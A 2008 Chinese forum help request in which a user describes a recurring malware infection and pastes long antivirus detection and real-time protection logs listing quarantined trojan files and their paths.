‹‹ 上一主题 | 下一主题 ››
 24 12
发新话题
打印

[求助] 紧急求助!!ftpPOPO杀不了

dayday315

新兵

积分
44 
威望
92  
元宝
0  
铜钱
66  
1楼 发表于 2008-10-1 03:54  只看该作者

紧急求助!!ftpPOPO杀不了

到网上查过了,应该是系统里有个"病根子",只是病根不是病毒,但是会从网站上自动下载木马病毒,而毒霸的防毒也只是拦截删除的下载下来的毒(那么多毒,总要下到病毒库里没有的吧~已经受过几次伤了,全部格式化完,重新分区做的系统)病毒依然存在,很郁闷,用毒霸扫不出来毒,用360能扫出来杀了,但是过段时间此病毒又会冒出来,时间隔的不长.在网上查应该是c盘里windows\help里面的bai.vbs    bai.bat   help.dll  几个文件有关,用文本方式打开里面有很多代码和一些网站,我已经将这几个文件里内容清空,而改为只读方式,但是问题还是没有解决!!!!!!
以下是毒霸最近抢杀的日志:
病毒 2008-10-01 03:22:16 C:\WINDOWS\System32\1.KAB SpyWare 清除成功
病毒 2008-10-01 03:22:16 C:\WINDOWS\System32\afcdmw.dll SpyWare 清除成功
病毒 2008-10-01 03:22:16 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\qqnbmpqlveow.exe SpyWare 清除成功
病毒 2008-09-29 03:15:19 C:\WINDOWS\1.KAB SpyWare 清除成功
病毒 2008-09-29 03:15:19 C:\WINDOWS\explorer.exe.bak SpyWare 清除成功
病毒 2008-09-29 02:49:15 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\_tmp.bat SpyWare 清除成功
病毒 2008-09-29 02:49:15 C:\WINDOWS\SoundMan.exe SpyWare 清除成功
病毒 2008-09-29 01:13:23 C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\FMSJZLK9\ssave[1].jpg Win32.Hack.ReSSDT.p.110592 清除成功
病毒 2008-09-29 01:13:23 C:\WINDOWS\SoundMan.exe SpyWare 清除成功
病毒 2008-09-28 16:37:29 C:\WINDOWS\system32\1.KAB SpyWare 清除成功
病毒 2008-09-28 16:37:29 C:\WINDOWS\system32\notepde.exe SpyWare 清除成功
病毒 2008-09-28 16:37:29 C:\WINDOWS\1.KAB SpyWare 清除成功
病毒 2008-09-28 16:37:29 C:\WINDOWS\SoundMan.exe SpyWare 清除成功
病毒 2008-09-28 00:59:12 C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\V999B7QP\ssave[1].jpg Win32.Hack.ReSSDT.p.110592 清除成功
病毒 2008-09-22 13:58:03 C:\WINDOWS\Downloaded Program Files\4.KAB SpyWare 清除成功
病毒 2008-09-22 13:58:03 C:\WINDOWS\Downloaded Program Files\CnsMinIO.dll SpyWare 清除成功
病毒 2008-09-22 13:58:03 C:\WINDOWS\Downloaded Program Files\3.KAB SpyWare 清除成功
病毒 2008-09-22 13:58:03 C:\WINDOWS\Downloaded Program Files\CnsMinEx.dll SpyWare 清除成功
病毒 2008-09-22 13:58:03 C:\WINDOWS\Downloaded Program Files\2.KAB SpyWare 清除成功
病毒 2008-09-22 13:58:03 C:\WINDOWS\Downloaded Program Files\CnsMin.dll SpyWare 清除成功
病毒 2008-09-22 13:58:03 C:\WINDOWS\Downloaded Program Files\1.KAB SpyWare 清除成功
病毒 2008-09-22 13:58:03 C:\WINDOWS\Downloaded Program Files\cnsio.dll SpyWare 清除成功
病毒 2008-09-22 13:58:03 C:\WINDOWS\Downloaded Program Files\CnsHook.dll SpyWare 清除成功
这是最近的实时防毒的日志:
实时防毒(按时间降序排列)
信息 2008-10-01 03:21:56 KWatch3.SYS开始运行   
信息 2008-10-01 03:21:56 KAEngine初始化成功   
信息 2008-10-01 03:21:43 KWatch3.SYS初始化成功   
信息 2008-10-01 03:21:43 KWatch3.SYS开始加载   
信息 2008-10-01 03:21:43 KAVIPC开始运行   
信息 2008-10-01 03:21:43 KAVIPC初始化成功   
信息 2008-10-01 03:21:43 KAVIPC开始加载   
信息 2008-10-01 03:21:43 Windows Security Center初始化成功   
信息 2008-10-01 03:21:43 Restore-Module初始化成功   
信息 2008-10-01 03:21:43 Windows Logon Splash初始化成功   
信息 2008-10-01 03:21:43 金山毒霸文件实时防毒开始加载   
病毒 2008-10-01 03:16:02 病毒在文件C:\WINDOWS\HELP\BAI.VBS中 VBS.Agent.vv.923 处理成功(操作:删除)
病毒 2008-10-01 03:10:13 病毒在文件C:\chzutzlf.exe中 Win32.Troj.XSey.a.434176 处理成功(操作:删除)
信息 2008-10-01 03:01:32 金山毒霸文件实时防毒被通知重启   
信息 2008-09-30 17:52:29 KWatch3.SYS开始运行   
信息 2008-09-30 17:52:29 KAEngine初始化成功   
信息 2008-09-30 17:51:52 KWatch3.SYS初始化成功   
信息 2008-09-30 17:51:52 KWatch3.SYS开始加载   
信息 2008-09-30 17:51:52 KAVIPC开始运行   
信息 2008-09-30 17:51:52 KAVIPC初始化成功   
信息 2008-09-30 17:51:52 KAVIPC开始加载   
信息 2008-09-30 17:51:52 Windows Security Center初始化成功   
信息 2008-09-30 17:51:52 Restore-Module初始化成功   
信息 2008-09-30 17:51:52 Windows Logon Splash初始化成功   
信息 2008-09-30 17:51:52 金山毒霸文件实时防毒开始加载   
信息 2008-09-30 16:49:12 KWatch3.SYS开始运行   
信息 2008-09-30 16:49:11 KAEngine初始化成功   
信息 2008-09-30 16:48:36 KWatch3.SYS初始化成功   
信息 2008-09-30 16:48:36 KWatch3.SYS开始加载   
信息 2008-09-30 16:48:36 KAVIPC开始运行   
信息 2008-09-30 16:48:36 KAVIPC初始化成功   
信息 2008-09-30 16:48:36 KAVIPC开始加载   
信息 2008-09-30 16:48:36 Windows Security Center初始化成功   
信息 2008-09-30 16:48:36 Restore-Module初始化成功   
信息 2008-09-30 16:48:36 Windows Logon Splash初始化成功   
信息 2008-09-30 16:48:36 金山毒霸文件实时防毒开始加载   
信息 2008-09-30 16:42:06 金山毒霸文件实时防毒被通知重启   
病毒 2008-09-30 16:27:09 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HJVJTX4E\as[1].htm中 JS.Downloader.fc.907 处理成功(操作:删除)
病毒 2008-09-30 16:27:07 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\TKOF1HO9\bfyy[1].htm中 JS.Agent.jw.2842 处理成功(操作:删除)
病毒 2008-09-30 16:26:43 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\2HPI7IPC\as[1].htm中 JS.Downloader.fc.907 处理成功(操作:删除)
病毒 2008-09-30 16:26:38 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\2HPI7IPC\bfyy[1].htm中 JS.Agent.jw.2842 处理成功(操作:删除)
病毒 2008-09-30 16:12:52 病毒在文件C:\vgxxhrp.exe中 Win32.Troj.XSey.a.405504 处理成功(操作:删除)
信息 2008-09-30 14:26:11 KWatch3.SYS开始运行   
信息 2008-09-30 14:26:11 KAEngine初始化成功   
信息 2008-09-30 14:25:37 KWatch3.SYS初始化成功   
信息 2008-09-30 14:25:37 KWatch3.SYS开始加载   
信息 2008-09-30 14:25:37 KAVIPC开始运行   
信息 2008-09-30 14:25:37 KAVIPC初始化成功   
信息 2008-09-30 14:25:37 KAVIPC开始加载   
信息 2008-09-30 14:25:37 Windows Security Center初始化成功   
信息 2008-09-30 14:25:37 Restore-Module初始化成功   
信息 2008-09-30 14:25:37 Windows Logon Splash初始化成功   
信息 2008-09-30 14:25:37 金山毒霸文件实时防毒开始加载   
信息 2008-09-30 00:22:50 KWatch3.SYS开始运行   
信息 2008-09-30 00:22:50 KAEngine初始化成功   
信息 2008-09-30 00:22:14 KWatch3.SYS初始化成功   
信息 2008-09-30 00:22:14 KWatch3.SYS开始加载   
信息 2008-09-30 00:22:14 KAVIPC开始运行   
信息 2008-09-30 00:22:14 KAVIPC初始化成功   
信息 2008-09-30 00:22:14 KAVIPC开始加载   
信息 2008-09-30 00:22:14 Windows Security Center初始化成功   
信息 2008-09-30 00:22:14 Restore-Module初始化成功   
信息 2008-09-30 00:22:14 Windows Logon Splash初始化成功   
信息 2008-09-30 00:22:14 金山毒霸文件实时防毒开始加载   
信息 2008-09-29 17:38:51 KWatch3.SYS开始运行   
信息 2008-09-29 17:38:51 KAEngine初始化成功   
信息 2008-09-29 17:38:21 KWatch3.SYS初始化成功   
信息 2008-09-29 17:38:21 KWatch3.SYS开始加载   
信息 2008-09-29 17:38:21 KAVIPC开始运行   
信息 2008-09-29 17:38:21 KAVIPC初始化成功   
信息 2008-09-29 17:38:21 KAVIPC开始加载   
信息 2008-09-29 17:38:21 Windows Security Center初始化成功   
信息 2008-09-29 17:38:21 Restore-Module初始化成功   
信息 2008-09-29 17:38:21 Windows Logon Splash初始化成功   
信息 2008-09-29 17:38:21 金山毒霸文件实时防毒开始加载   
病毒 2008-09-29 17:13:06 病毒在文件C:\wpdjcevc.exe中 Win32.Troj.XSey.a.405504 处理成功(操作:删除)
信息 2008-09-29 16:11:17 金山毒霸文件实时防毒被通知重启   
信息 2008-09-29 16:04:51 KWatch3.SYS开始运行   
信息 2008-09-29 16:04:51 KAEngine初始化成功   
信息 2008-09-29 16:04:46 KWatch3.SYS初始化成功   
信息 2008-09-29 16:04:46 KWatch3.SYS开始加载   
信息 2008-09-29 16:04:46 KAVIPC开始运行   
信息 2008-09-29 16:04:46 KAVIPC初始化成功   
信息 2008-09-29 16:04:46 KAVIPC开始加载   
信息 2008-09-29 16:04:46 Windows Security Center初始化成功   
信息 2008-09-29 16:04:46 Restore-Module初始化成功   
信息 2008-09-29 16:04:46 Windows Logon Splash初始化成功   
信息 2008-09-29 16:04:46 金山毒霸文件实时防毒开始加载   
信息 2008-09-29 03:14:01 KWatch3.SYS开始运行   
信息 2008-09-29 03:14:01 KAEngine初始化成功   
信息 2008-09-29 03:13:55 KWatch3.SYS初始化成功   
信息 2008-09-29 03:13:55 KWatch3.SYS开始加载   
信息 2008-09-29 03:13:55 KAVIPC开始运行   
信息 2008-09-29 03:13:55 KAVIPC初始化成功   
信息 2008-09-29 03:13:55 KAVIPC开始加载   
信息 2008-09-29 03:13:55 Windows Security Center初始化成功   
信息 2008-09-29 03:13:55 Restore-Module初始化成功   
信息 2008-09-29 03:13:55 Windows Logon Splash初始化成功   
信息 2008-09-29 03:13:55 金山毒霸文件实时防毒开始加载   
信息 2008-09-29 02:48:50 KWatch3.SYS开始运行   
信息 2008-09-29 02:48:50 KAEngine初始化成功   
信息 2008-09-29 02:48:43 KWatch3.SYS初始化成功   
信息 2008-09-29 02:48:43 KWatch3.SYS开始加载   
信息 2008-09-29 02:48:43 KAVIPC开始运行   
信息 2008-09-29 02:48:43 KAVIPC初始化成功   
信息 2008-09-29 02:48:43 KAVIPC开始加载   
信息 2008-09-29 02:48:43 Windows Security Center初始化成功   
信息 2008-09-29 02:48:43 Restore-Module初始化成功   
信息 2008-09-29 02:48:43 Windows Logon Splash初始化成功   
信息 2008-09-29 02:48:43 金山毒霸文件实时防毒开始加载   
病毒 2008-09-29 02:30:56 病毒在文件C:\WINDOWS\help\bai.vbs中 VBS.Agent.vv.923 处理成功(操作:删除)
病毒 2008-09-29 02:30:10 病毒在文件C:\WINDOWS\system32\uvspqn.exe中 Win32.Hack.ReSSDT.p.39979 处理成功(操作:删除)
病毒 2008-09-29 02:29:59 病毒在文件C:\WINDOWS\system32\ssave.exe中 Win32.Hack.ReSSDT.p.110592 处理成功(操作:删除)
病毒 2008-09-29 02:28:03 病毒在文件C:\WINDOWS\system32\drivers\zqcaxyo.sys中 Win32.Hack.ReSSDT.p.3328 处理成功(操作:删除)
信息 2008-09-29 02:18:51 KWatch3.SYS开始运行   
信息 2008-09-29 02:18:51 KAEngine初始化成功   
信息 2008-09-29 02:17:55 KWatch3.SYS初始化成功   
信息 2008-09-29 02:17:55 KWatch3.SYS开始加载   
信息 2008-09-29 02:17:55 KAVIPC开始运行   
信息 2008-09-29 02:17:55 KAVIPC初始化成功   
信息 2008-09-29 02:17:55 KAVIPC开始加载   
信息 2008-09-29 02:17:55 Windows Security Center初始化成功   
信息 2008-09-29 02:17:55 Restore-Module初始化成功   
信息 2008-09-29 02:17:55 Windows Logon Splash初始化成功   
信息 2008-09-29 02:17:55 金山毒霸文件实时防毒开始加载   
信息 2008-09-29 01:13:13 KWatch3.SYS开始运行   
信息 2008-09-29 01:13:13 KAEngine初始化成功   
信息 2008-09-29 01:12:34 KWatch3.SYS初始化成功   
信息 2008-09-29 01:12:34 KWatch3.SYS开始加载   
信息 2008-09-29 01:12:33 KAVIPC开始运行   
信息 2008-09-29 01:12:33 KAVIPC初始化成功   
信息 2008-09-29 01:12:33 KAVIPC开始加载   
信息 2008-09-29 01:12:33 Windows Security Center初始化成功   
信息 2008-09-29 01:12:33 Restore-Module初始化成功   
信息 2008-09-29 01:12:33 Windows Logon Splash初始化成功   
信息 2008-09-29 01:12:33 金山毒霸文件实时防毒开始加载   
病毒 2008-09-29 00:11:24 病毒在文件C:\WINDOWS\system32\kghhx.dll中 Win32.Troj.XSey.a.458752 处理成功(操作:删除)
病毒 2008-09-29 00:10:03 病毒在文件C:\WINDOWS\system32\ssave.exe中 Win32.Hack.ReSSDT.p.110592 处理成功(操作:删除)
病毒 2008-09-29 00:10:03 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\FMSJZLK9\ssave[1].jpg中 Win32.Hack.ReSSDT.p.110592 拦截成功(文件被禁止访问)
信息 2008-09-28 23:33:20 KWatch3.SYS开始运行   
信息 2008-09-28 23:33:20 KAEngine初始化成功   
信息 2008-09-28 23:32:37 KWatch3.SYS初始化成功   
信息 2008-09-28 23:32:37 KWatch3.SYS开始加载   
信息 2008-09-28 23:32:37 KAVIPC开始运行   
信息 2008-09-28 23:32:37 KAVIPC初始化成功   
信息 2008-09-28 23:32:37 KAVIPC开始加载   
信息 2008-09-28 23:32:37 Windows Security Center初始化成功   
信息 2008-09-28 23:32:37 Restore-Module初始化成功   
信息 2008-09-28 23:32:37 Windows Logon Splash初始化成功   
信息 2008-09-28 23:32:37 金山毒霸文件实时防毒开始加载   
信息 2008-09-28 16:37:05 KWatch3.SYS开始运行   
信息 2008-09-28 16:37:05 KAEngine初始化成功   
信息 2008-09-28 16:36:58 KWatch3.SYS初始化成功   
信息 2008-09-28 16:36:58 KWatch3.SYS开始加载   
信息 2008-09-28 16:36:58 KAVIPC开始运行   
信息 2008-09-28 16:36:58 KAVIPC初始化成功   
信息 2008-09-28 16:36:58 KAVIPC开始加载   
信息 2008-09-28 16:36:58 Windows Security Center初始化成功   
信息 2008-09-28 16:36:58 Restore-Module初始化成功   
信息 2008-09-28 16:36:58 Windows Logon Splash初始化成功   
信息 2008-09-28 16:36:58 金山毒霸文件实时防毒开始加载   
信息 2008-09-28 15:05:44 KWatch3.SYS开始运行   
信息 2008-09-28 15:05:44 KAEngine初始化成功   
信息 2008-09-28 15:04:54 KWatch3.SYS初始化成功   
信息 2008-09-28 15:04:54 KWatch3.SYS开始加载   
信息 2008-09-28 15:04:54 KAVIPC开始运行   
信息 2008-09-28 15:04:54 KAVIPC初始化成功   
信息 2008-09-28 15:04:54 KAVIPC开始加载   
信息 2008-09-28 15:04:54 Windows Security Center初始化成功   
信息 2008-09-28 15:04:54 Restore-Module初始化成功   
信息 2008-09-28 15:04:54 Windows Logon Splash初始化成功   
信息 2008-09-28 15:04:54 金山毒霸文件实时防毒开始加载   
信息 2008-09-28 00:59:00 KWatch3.SYS开始运行   
信息 2008-09-28 00:59:00 KAEngine初始化成功   
信息 2008-09-28 00:58:46 KWatch3.SYS初始化成功   
信息 2008-09-28 00:58:46 KWatch3.SYS开始加载   
信息 2008-09-28 00:58:46 KAVIPC开始运行   
信息 2008-09-28 00:58:46 KAVIPC初始化成功   
信息 2008-09-28 00:58:46 KAVIPC开始加载   
信息 2008-09-28 00:58:46 Windows Security Center初始化成功   
信息 2008-09-28 00:58:46 Restore-Module初始化成功   
信息 2008-09-28 00:58:46 Windows Logon Splash初始化成功   
信息 2008-09-28 00:58:46 金山毒霸文件实时防毒开始加载   
病毒 2008-09-28 00:52:42 病毒在文件C:\WINDOWS\help\bai.vbs中 VBS.Agent.vv.923 处理成功(操作:删除)
信息 2008-09-28 00:30:33 金山毒霸文件实时防毒被通知重启   
信息 2008-09-28 00:30:33 KWatch3.SYS开始运行   
信息 2008-09-28 00:30:33 KAEngine初始化成功   
信息 2008-09-28 00:30:32 KWatch3.SYS初始化成功   
信息 2008-09-28 00:30:32 KWatch3.SYS开始加载   
信息 2008-09-28 00:30:32 KAVIPC开始运行   
信息 2008-09-28 00:30:32 KAVIPC初始化成功   
信息 2008-09-28 00:30:32 KAVIPC开始加载   
信息 2008-09-28 00:30:32 Windows Security Center初始化成功   
信息 2008-09-28 00:30:32 Restore-Module初始化成功   
信息 2008-09-28 00:30:32 Windows Logon Splash初始化成功   
信息 2008-09-28 00:30:32 金山毒霸文件实时防毒开始加载   
信息 2008-09-28 00:30:26 金山毒霸文件实时防毒已经卸载   
信息 2008-09-28 00:30:26 Windows Logon Splash反初始化成功   
信息 2008-09-28 00:30:26 Restore-Module反初始化成功   
信息 2008-09-28 00:30:26 Windows Security Center反初始化成功   
信息 2008-09-28 00:30:26 KAVIPC已经卸载   
信息 2008-09-28 00:30:26 KAVIPC反初始化成功   
信息 2008-09-28 00:30:26 KAVIPC已经停止   
信息 2008-09-28 00:30:26 KWatch3.SYS已经卸载   
信息 2008-09-28 00:30:25 KWatch3.SYS反初始化成功   
信息 2008-09-28 00:30:25 KAEngine反初始化成功   
信息 2008-09-28 00:30:25 KWatch3.SYS已经停止   
病毒 2008-09-28 00:22:24 病毒在文件C:\WINDOWS\system32\BsHelpA.exe中 Win32.Hack.RBot.b.18432 处理成功(操作:删除)
病毒 2008-09-28 00:12:21 病毒在文件C:\WINDOWS\system32\ssave.exe中 Win32.Hack.ReSSDT.p.110592 处理成功(操作:删除)
病毒 2008-09-28 00:12:21 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\V999B7QP\ssave[1].jpg中 Win32.Hack.ReSSDT.p.110592 拦截成功(文件被禁止访问)
信息 2008-09-27 23:57:29 KWatch3.SYS开始运行   
信息 2008-09-27 23:57:29 KAEngine初始化成功   
信息 2008-09-27 23:56:49 KWatch3.SYS初始化成功   
信息 2008-09-27 23:56:49 KWatch3.SYS开始加载   
信息 2008-09-27 23:56:48 KAVIPC开始运行   
信息 2008-09-27 23:56:48 KAVIPC初始化成功   
信息 2008-09-27 23:56:48 KAVIPC开始加载   
信息 2008-09-27 23:56:48 Windows Security Center初始化成功   
信息 2008-09-27 23:56:48 Restore-Module初始化成功   
信息 2008-09-27 23:56:48 Windows Logon Splash初始化成功   
信息 2008-09-27 23:56:48 金山毒霸文件实时防毒开始加载   
信息 2008-09-27 19:56:19 KWatch3.SYS开始运行   
信息 2008-09-27 19:56:19 KAEngine初始化成功   
信息 2008-09-27 19:55:46 KWatch3.SYS初始化成功   
信息 2008-09-27 19:55:46 KWatch3.SYS开始加载   
信息 2008-09-27 19:55:45 KAVIPC开始运行   
信息 2008-09-27 19:55:45 KAVIPC初始化成功   
信息 2008-09-27 19:55:45 KAVIPC开始加载   
信息 2008-09-27 19:55:45 Windows Security Center初始化成功   
信息 2008-09-27 19:55:45 Restore-Module初始化成功   
信息 2008-09-27 19:55:45 Windows Logon Splash初始化成功   
信息 2008-09-27 19:55:45 金山毒霸文件实时防毒开始加载   
病毒 2008-09-27 19:41:26 病毒在文件C:\lhnwk.exe中 Win32.Troj.XSey.a.425984 处理成功(操作:删除)
病毒 2008-09-27 19:21:19 病毒在文件C:\wlepqfa.exe中 Win32.Troj.XSey.a.434176 处理成功(操作:删除)
信息 2008-09-27 19:02:40 KWatch3.SYS开始运行   
信息 2008-09-27 19:02:40 KAEngine初始化成功   
信息 2008-09-27 19:02:13 KWatch3.SYS初始化成功   
信息 2008-09-27 19:02:13 KWatch3.SYS开始加载   
信息 2008-09-27 19:02:12 KAVIPC开始运行   
信息 2008-09-27 19:02:12 KAVIPC初始化成功   
信息 2008-09-27 19:02:12 KAVIPC开始加载   
信息 2008-09-27 19:02:12 Windows Security Center初始化成功   
信息 2008-09-27 19:02:12 Restore-Module初始化成功   
信息 2008-09-27 19:02:12 Windows Logon Splash初始化成功   
信息 2008-09-27 19:02:12 金山毒霸文件实时防毒开始加载   
信息 2008-09-27 11:29:09 KWatch3.SYS开始运行   
信息 2008-09-27 11:29:09 KAEngine初始化成功   
信息 2008-09-27 11:28:48 KWatch3.SYS初始化成功   
信息 2008-09-27 11:28:48 KWatch3.SYS开始加载   
信息 2008-09-27 11:28:47 KAVIPC开始运行   
信息 2008-09-27 11:28:47 KAVIPC初始化成功   
信息 2008-09-27 11:28:47 KAVIPC开始加载   
信息 2008-09-27 11:28:47 Windows Security Center初始化成功   
信息 2008-09-27 11:28:47 Restore-Module初始化成功   
信息 2008-09-27 11:28:47 Windows Logon Splash初始化成功   
信息 2008-09-27 11:28:47 金山毒霸文件实时防毒开始加载   
病毒 2008-09-27 11:27:05 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\NJ1ZJL8W\gx[1].jpg中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
病毒 2008-09-27 11:25:51 病毒在文件C:\WINDOWS\system32\cc.exe中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
信息 2008-09-27 10:55:52 金山毒霸文件实时防毒被通知重启   
信息 2008-09-27 10:53:33 KWatch3.SYS开始运行   
信息 2008-09-27 10:53:33 KAEngine初始化成功   
信息 2008-09-27 10:53:05 KWatch3.SYS初始化成功   
信息 2008-09-27 10:53:05 KWatch3.SYS开始加载   
信息 2008-09-27 10:53:05 KAVIPC开始运行   
信息 2008-09-27 10:53:05 KAVIPC初始化成功   
信息 2008-09-27 10:53:05 KAVIPC开始加载   
信息 2008-09-27 10:53:05 Windows Security Center初始化成功   
信息 2008-09-27 10:53:05 Restore-Module初始化成功   
信息 2008-09-27 10:53:05 Windows Logon Splash初始化成功   
信息 2008-09-27 10:53:05 金山毒霸文件实时防毒开始加载   
信息 2008-09-26 23:38:30 KWatch3.SYS开始运行   
信息 2008-09-26 23:38:29 KAEngine初始化成功   
信息 2008-09-26 23:38:00 KWatch3.SYS初始化成功   
信息 2008-09-26 23:38:00 KWatch3.SYS开始加载   
信息 2008-09-26 23:38:00 KAVIPC开始运行   
信息 2008-09-26 23:38:00 KAVIPC初始化成功   
信息 2008-09-26 23:38:00 KAVIPC开始加载   
信息 2008-09-26 23:38:00 Windows Security Center初始化成功   
信息 2008-09-26 23:38:00 Restore-Module初始化成功   
信息 2008-09-26 23:38:00 Windows Logon Splash初始化成功   
信息 2008-09-26 23:37:59 金山毒霸文件实时防毒开始加载   
信息 2008-09-26 18:02:51 KWatch3.SYS开始运行   
信息 2008-09-26 18:02:51 KAEngine初始化成功   
信息 2008-09-26 18:02:23 KWatch3.SYS初始化成功   
信息 2008-09-26 18:02:23 KWatch3.SYS开始加载   
信息 2008-09-26 18:02:23 KAVIPC开始运行   
信息 2008-09-26 18:02:23 KAVIPC初始化成功   
信息 2008-09-26 18:02:23 KAVIPC开始加载   
信息 2008-09-26 18:02:23 Windows Security Center初始化成功   
信息 2008-09-26 18:02:23 Restore-Module初始化成功   
信息 2008-09-26 18:02:23 Windows Logon Splash初始化成功   
信息 2008-09-26 18:02:23 金山毒霸文件实时防毒开始加载   
病毒 2008-09-26 17:24:27 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\NS10RXJH\CA54OBH1.jpg中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
信息 2008-09-26 17:08:09 金山毒霸文件实时防毒被通知重启   
病毒 2008-09-26 17:05:44 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\2HPI7IPC\gx[1].jpg中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
病毒 2008-09-26 16:30:54 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\NS10RXJH\CABUKV7P.jpg中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
信息 2008-09-26 15:30:54 金山毒霸文件实时防毒被通知重启   
信息 2008-09-26 13:22:56 KWatch3.SYS开始运行   
信息 2008-09-26 13:22:56 KAEngine初始化成功   
信息 2008-09-26 13:22:42 KWatch3.SYS初始化成功   
信息 2008-09-26 13:22:42 KWatch3.SYS开始加载   
信息 2008-09-26 13:22:42 KAVIPC开始运行   
信息 2008-09-26 13:22:42 KAVIPC初始化成功   
信息 2008-09-26 13:22:42 KAVIPC开始加载   
信息 2008-09-26 13:22:42 Windows Security Center初始化成功   
信息 2008-09-26 13:22:42 Restore-Module初始化成功   
信息 2008-09-26 13:22:42 Windows Logon Splash初始化成功   
信息 2008-09-26 13:22:42 金山毒霸文件实时防毒开始加载   
信息 2008-09-26 13:16:16 KWatch3.SYS开始运行   
信息 2008-09-26 13:16:16 KAEngine初始化成功   
信息 2008-09-26 13:15:59 KWatch3.SYS初始化成功   
信息 2008-09-26 13:15:59 KWatch3.SYS开始加载   
信息 2008-09-26 13:15:59 KAVIPC开始运行   
信息 2008-09-26 13:15:59 KAVIPC初始化成功   
信息 2008-09-26 13:15:59 KAVIPC开始加载   
信息 2008-09-26 13:15:59 Windows Security Center初始化成功   
信息 2008-09-26 13:15:59 Restore-Module初始化成功   
信息 2008-09-26 13:15:59 Windows Logon Splash初始化成功   
信息 2008-09-26 13:15:59 金山毒霸文件实时防毒开始加载   
信息 2008-09-26 13:08:32 KWatch3.SYS开始运行   
信息 2008-09-26 13:08:32 KAEngine初始化成功   
信息 2008-09-26 13:08:07 KWatch3.SYS初始化成功   
信息 2008-09-26 13:08:07 KWatch3.SYS开始加载   
信息 2008-09-26 13:08:07 KAVIPC开始运行   
信息 2008-09-26 13:08:07 KAVIPC初始化成功   
信息 2008-09-26 13:08:07 KAVIPC开始加载   
信息 2008-09-26 13:08:07 Windows Security Center初始化成功   
信息 2008-09-26 13:08:07 Restore-Module初始化成功   
信息 2008-09-26 13:08:07 Windows Logon Splash初始化成功   
信息 2008-09-26 13:08:07 金山毒霸文件实时防毒开始加载   
病毒 2008-09-26 12:37:39 病毒在文件C:\frwemfns.exe中 Win32.Troj.XSey.a.405504 处理成功(操作:删除)
病毒 2008-09-26 12:04:05 病毒在文件C:\Documents and Settings\Administrator\桌面\alhdpw.exe中 Win32.Troj.XSey.a.401408 处理成功(操作:删除)
病毒 2008-09-26 12:02:20 病毒在文件C:\objarhk.exe中 Win32.Troj.XSey.a.434176 处理成功(操作:删除)
信息 2008-09-26 11:59:28 KWatch3.SYS已经恢复运行   
信息 2008-09-26 11:37:13 KWatch3.SYS进入暂停状态   
病毒 2008-09-26 11:36:52 病毒在文件C:\Documents and Settings\Administrator\桌面\kbltfqb.exe中 Win32.Troj.XSey.a.405504 处理成功(操作:删除)
病毒 2008-09-26 11:25:58 病毒在文件C:\qdmtdvs.exe中 Win32.Troj.XSeyT.vb.401408 处理成功(操作:删除)
信息 2008-09-26 11:19:11 KWatch3.SYS开始运行   
信息 2008-09-26 11:19:11 KAEngine初始化成功   
信息 2008-09-26 11:18:35 KWatch3.SYS初始化成功   
信息 2008-09-26 11:18:35 KWatch3.SYS开始加载   
信息 2008-09-26 11:18:35 KAVIPC开始运行   
信息 2008-09-26 11:18:35 KAVIPC初始化成功   
信息 2008-09-26 11:18:35 KAVIPC开始加载   
信息 2008-09-26 11:18:35 Windows Security Center初始化成功   
信息 2008-09-26 11:18:35 Restore-Module初始化成功   
信息 2008-09-26 11:18:35 Windows Logon Splash初始化成功   
信息 2008-09-26 11:18:35 金山毒霸文件实时防毒开始加载   
病毒 2008-09-25 23:48:47 病毒在文件C:\kbltfqb.exe中 Win32.Troj.XSey.a.405504 处理成功(操作:删除)
信息 2008-09-25 21:27:39 金山毒霸文件实时防毒被通知重启   
信息 2008-09-25 21:22:58 KWatch3.SYS开始运行   
信息 2008-09-25 21:22:58 KAEngine初始化成功   
信息 2008-09-25 21:22:34 KWatch3.SYS初始化成功   
信息 2008-09-25 21:22:34 KWatch3.SYS开始加载   
信息 2008-09-25 21:22:34 KAVIPC开始运行   
信息 2008-09-25 21:22:34 KAVIPC初始化成功   
信息 2008-09-25 21:22:34 KAVIPC开始加载   
信息 2008-09-25 21:22:34 Windows Security Center初始化成功   
信息 2008-09-25 21:22:34 Restore-Module初始化成功   
信息 2008-09-25 21:22:34 Windows Logon Splash初始化成功   
信息 2008-09-25 21:22:34 金山毒霸文件实时防毒开始加载   
信息 2008-09-25 11:55:21 KWatch3.SYS开始运行   
信息 2008-09-25 11:55:21 KAEngine初始化成功   
信息 2008-09-25 11:54:55 KWatch3.SYS初始化成功   
信息 2008-09-25 11:54:55 KWatch3.SYS开始加载   
信息 2008-09-25 11:54:55 KAVIPC开始运行   
信息 2008-09-25 11:54:55 KAVIPC初始化成功   
信息 2008-09-25 11:54:55 KAVIPC开始加载   
信息 2008-09-25 11:54:55 Windows Security Center初始化成功   
信息 2008-09-25 11:54:55 Restore-Module初始化成功   
信息 2008-09-25 11:54:55 Windows Logon Splash初始化成功   
信息 2008-09-25 11:54:55 金山毒霸文件实时防毒开始加载   
信息 2008-09-25 00:45:06 金山毒霸文件实时防毒被通知重启   
信息 2008-09-25 00:33:40 KWatch3.SYS开始运行   
信息 2008-09-25 00:33:40 KAEngine初始化成功   
信息 2008-09-25 00:33:18 KWatch3.SYS初始化成功   
信息 2008-09-25 00:33:18 KWatch3.SYS开始加载   
